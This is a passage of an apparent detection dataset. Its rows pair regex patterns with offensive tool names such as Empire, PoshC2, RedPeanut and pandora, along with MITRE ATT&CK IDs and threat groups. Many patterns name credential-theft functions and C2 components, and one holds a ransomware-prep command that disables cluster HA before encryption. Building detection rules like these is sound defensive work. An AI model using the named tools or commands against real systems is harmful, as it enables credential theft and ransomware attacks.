PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45910" "*getcap not found in PATH, cannot escalate using capabilities*",".{0,1000}getcap\snot\sfound\sin\sPATH,\scannot\sescalate\susing\scapabilities.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","45911" "*Get-ChromeBookmarks*",".{0,1000}Get\-ChromeBookmarks.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45916" "*Get-ChromeDump *",".{0,1000}Get\-ChromeDump\s.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45917" "*Get-ChromeDump*",".{0,1000}Get\-ChromeDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1150","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45918" "*Get-ChromeDump*",".{0,1000}Get\-ChromeDump.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - 
T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45919" "*Get-ChromeDump.ps1*",".{0,1000}Get\-ChromeDump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - 
T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45920" "*Get-ChromeHistory*",".{0,1000}Get\-ChromeHistory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45921" "*Get-ChromePasswords.ps1*",".{0,1000}Get\-ChromePasswords\.ps1.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45922" "*GetChromeSecrets*",".{0,1000}GetChromeSecrets.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","45923" "*GETCLIPBOARD*GETLOCALGROUP*",".{0,1000}GETCLIPBOARD.{0,1000}GETLOCALGROUP.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","45924" "*Get-ClipboardContents*",".{0,1000}Get\-ClipboardContents.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45925" "*Get-ClipboardContents.ps1*",".{0,1000}Get\-ClipboardContents\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1070","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45926" "*Get-CLSIDRegistryKeys -RegHive *",".{0,1000}Get\-CLSIDRegistryKeys\s\-RegHive\s.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","45927" "*Get-Cluster|Set-Cluster -HAEnabled:$false -DrsEnabled:$false*",".{0,1000}Get\-Cluster\|Set\-Cluster\s\-HAEnabled\:\$false\s\-DrsEnabled\:\$false.{0,1000}","offensive_tool_keyword","powershell","Disable HA first 
before encrypt anything","T1190 - T1059.001 - T1027 - T1486 - T1108","TA0001 - TA0002 - TA0003 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45928" "*Get-CompressedAgent*",".{0,1000}Get\-CompressedAgent.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45929" "*Get-CompressedAgent.ps1*",".{0,1000}Get\-CompressedAgent\.ps1.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45930" "*Get-CompressedShellcode*",".{0,1000}Get\-CompressedShellcode.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45931" "*Get-CompressedShellcode.ps1*",".{0,1000}Get\-CompressedShellcode\.ps1.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45932" "*Get-ComputerDetails*",".{0,1000}Get\-ComputerDetails.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","45933" "*Get-ComputerDetails.ps1*",".{0,1000}Get\-ComputerDetails\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 
- T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45934" "*GetComputersFromActiveDirectory*",".{0,1000}GetComputersFromActiveDirectory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - 
Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45935" "*Get-Content ""$env:LOCALAPPDATA\microsoft\remote desktop connection manager\rdcman.settings*",".{0,1000}Get\-Content\s\""\$env\:LOCALAPPDATA\\microsoft\\remote\sdesktop\sconnection\smanager\\rdcman\.settings.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","0","N/A","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","45936" "*Get-Content ./EncodedPayload.bat*",".{0,1000}Get\-Content\s\.\/EncodedPayload\.bat.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some of). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#linux","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","45937" "*Get-Content ./Roast.hash*",".{0,1000}Get\-Content\s\.\/Roast\.hash.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some of). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#linux","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","45938" "*Get-Content -path $dnshexfile *",".{0,1000}Get\-Content\s\-path\s\$dnshexfile\s.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","45939" "*get-creditcarddata *",".{0,1000}get\-creditcarddata\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45940" "*Get-CredPersist*",".{0,1000}Get\-CredPersist.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","45941" "*getCreds1passwordappEntries1.h*",".{0,1000}getCreds1passwordappEntries1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","45942" "*getCreds1passwordappEntries2.h*",".{0,1000}getCreds1passwordappEntries2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","45943" "*getCreds1passwordappMaster.h*",".{0,1000}getCreds1passwordappMaster\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","45944" "*getCreds1passwordplugin.h*",".{0,1000}getCreds1passwordplugin\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","45945" 
"*getCreds1passwordplugin2.h*",".{0,1000}getCreds1passwordplugin2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","45946" "*getCrossC2Beacon*",".{0,1000}getCrossC2Beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 